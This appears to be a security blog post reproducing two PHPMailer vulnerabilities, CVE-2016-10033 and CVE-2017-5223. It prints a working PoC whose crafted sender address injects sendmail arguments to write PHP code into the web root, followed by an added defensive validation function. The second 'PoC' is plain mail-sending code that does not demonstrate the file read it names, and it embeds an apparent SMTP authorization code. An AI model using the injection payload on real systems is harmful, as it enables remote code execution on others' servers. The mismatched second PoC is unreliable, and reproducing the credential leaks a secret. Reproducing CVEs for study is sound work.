Today, while browsing the official ThinkPHP site, I happened to download a copy of EduaskCMS. Looking through its Libs directory I found that it ships PHPMailer-5.2.13, which reminded me of the earlier PHPMailer vulnerabilities. Unfortunately this CMS only exposes a mail-sending interface (the front-end page has to be written by hand), so there is no way to reproduce the issues through the CMS itself. Instead I used this copy of PHPMailer-5.2.13 to reproduce CVE-2016-10033 and CVE-2017-5223 locally and recorded the results below.
PHPMailer command execution vulnerability (CVE-2016-10033)
Vulnerability number: CVE-2016-10033
Affected versions: PHPMailer < 5.2.18
Severity: High
Vulnerability PoC:
<?php
/*
 PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)

 A simple PoC (working on the Sendmail MTA).

 It will inject the following parameters into the sendmail command:

 arg no. 0 == [/usr/sbin/sendmail]
 arg no. 1 == [-t]
 arg no. 2 == [-i]
 arg no. 3 == [-fattacker\]
 arg no. 4 == [-oQ/tmp/]
 arg no. 5 == [-X/var/www/cache/phpcode.php]
 arg no. 6 == [some"@email.com]

 which would write the transfer log (-X) into the /var/www/cache/phpcode.php file.
 The resulting file would contain the payload passed in the body of the message:

 09607 <<< --b1_cb4566aa51be9f090d9419163e492306
 09607 <<< Content-Type: text/html; charset=us-ascii
 09607 <<<
 09607 <<< <?php phpinfo(); ?>
 09607 <<<
 09607 <<<
 09607 <<< --b1_cb4566aa51be9f090d9419163e492306--

 See the full advisory URL for details.
*/

// Attacker's input coming from an untrusted source such as $_GET, $_POST etc.,
// for example from a contact form.
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com';
$msg_body   = "<?php phpinfo(); ?>";

// ------------------

// mail() parameter injection via the vulnerability in PHPMailer
require_once('class.phpmailer.php');

$mail = new PHPMailer(); // defaults to using PHP's mail()

$mail->setFrom($email_from, 'Client Name');

$address = "recipient@example.com"; // recipient address is redacted in the source; placeholder
$mail->addAddress($address, "Some User");

$mail->Subject = "PHPMailer PoC Exploit CVE-2016-10033";
$mail->msgHTML($msg_body);

if (!$mail->send()) {
    echo "Mailer Error: " . $mail->ErrorInfo;
} else {
    echo "Message sent!\n";
}
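The injection above only works because the Sender address reaches sendmail's argv unchecked. The following application-side check is an added example (not code from this page, from EduaskCMS or from PHPMailer itself); it reproduces the allow-list idea behind PHPMailer's later isShellSafe() fix so that a form handler can refuse a sender like the PoC's before it is ever passed to setFrom(). The function name isSafeSenderAddress and the sample inputs are my own.

```php
<?php
// Added example, not the page's or PHPMailer's code: an application-side
// sender check modelled on the allow-list in PHPMailer's later isShellSafe().
// With the PHP mail() transport the Sender ends up in sendmail's argv as
// "-f<sender>", so anything beyond a plain address must be rejected.

/**
 * Return true only if $addr is a syntactically valid address built solely
 * from characters that cannot alter a sendmail command line.
 */
function isSafeSenderAddress(string $addr): bool
{
    // Must be a valid address to begin with.
    if (filter_var($addr, FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    // Must survive shell escaping unchanged (the same idea PHPMailer uses).
    if (escapeshellcmd($addr) !== $addr
        || !in_array(escapeshellarg($addr), ["'$addr'", "\"$addr\""], true)) {
        return false;
    }
    // Allow-list: alphanumerics plus @ _ - . only. Space, double quotes and
    // backslashes, all present in the PoC sender, fail this loop.
    for ($i = 0, $n = strlen($addr); $i < $n; $i++) {
        $c = $addr[$i];
        if (!ctype_alnum($c) && strpos('@_-.', $c) === false) {
            return false;
        }
    }
    return true;
}

// Constructed inputs: a normal sender and the injected sender from the PoC.
$inputs = [
    'alice@example.com',
    '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com',
];
foreach ($inputs as $in) {
    printf("%-70s => %s\n", $in, isSafeSenderAddress($in) ? 'accepted' : 'REJECTED');
}
```

A handler that calls setFrom() only when this returns true never hands sendmail an extra -oQ or -X argument, whichever PHPMailer version is installed.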
PHPMailer arbitrary file read vulnerability analysis (CVE-2017-5223)
Vulnerability number: CVE-2017-5223
Affected versions: PHPMailer <= 5.2.21
Severity: High
Vulnerability PoC: a few lines of the author's PoC were changed so that it works with a QQ mailbox (smtp.qq.com)
<?php
# Author: yxlink
require_once('PHPMailerAutoload.php');

$mail = new PHPMailer();
$mail->isSMTP();
$mail->Host       = 'smtp.qq.com';
$mail->Port       = 465;
$mail->SMTPAuth   = true;
$mail->Username   = 'user@qq.com';        // QQ account; redacted in the source, placeholder
$mail->Password   = 'zsuhxbmsaioxbcgaq';  // QQ SMTP authorization code as given in the source
$mail->SMTPSecure = 'ssl';
$mail->CharSet    = "UTF-8";
$mail->Encoding   = "base64";
$mail->Subject    = "Hello";
$mail->From       = "sender@example.com";    // redacted in the source; placeholder
$mail->FromName   = "Test";

$address = "recipient@example.com";         // redacted in the source; placeholder
$mail->addAddress($address, "test");
$mail->addAttachment('test.txt', 'test.txt');

$mail->isHTML(true);
$msg = "test";
$mail->msgHTML($msg);

if (!$mail->send()) {
    echo "Mailer Error: " . $mail->ErrorInfo;
} else {
    echo "Message sent!";
}
?>
References:
PHPMailer arbitrary file read vulnerability analysis (CVE-2017-5223): http://www.freebuf.com/vuls/124820.html
PHPMailer command execution vulnerability (CVE-2016-10033) analysis: http://blog.csdn.net/wyvbboy/article/details/53969278